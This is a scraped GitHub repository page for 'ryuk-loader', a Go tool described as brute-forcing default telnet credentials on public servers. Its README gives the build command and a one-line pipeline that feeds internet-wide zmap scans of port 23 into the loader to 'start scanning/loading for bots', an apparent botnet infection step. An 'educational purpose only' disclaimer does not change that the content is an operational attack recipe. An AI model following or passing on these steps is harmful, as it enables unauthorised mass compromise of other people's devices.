Thanks to visit codestin.com
Credit goes to github.com

Skip to content

maxi-schaefer/ryuk-loader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Ryuk Loader

A in go written loader for using default credentials on public telnet servers!

Loader Instructions:

The loader uses zmap for getting valid telnet ip addresses on port 23 and golang for trying default username + password combinations.

  1. Build the loader.go, for this you need to have golang on your system installed
cd ./loader && go build ./loader.go
  1. Install zmap using their guide

  2. Start Scanning/Loading for bots

ulimit -u999999; ulimit -n999999; zmap -p23 | ./loader



⚠️ This tool is for educational purpose only, The author is not responsible for any damage caused by running this script. Use it responsibly and avoid running it on production systems or devices you cannot afford to disrupt. Using this code to intentionally infect devices without consent may be illegal. ⚠️

About

A in go written loader for using default credentials on public telnet servers!

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages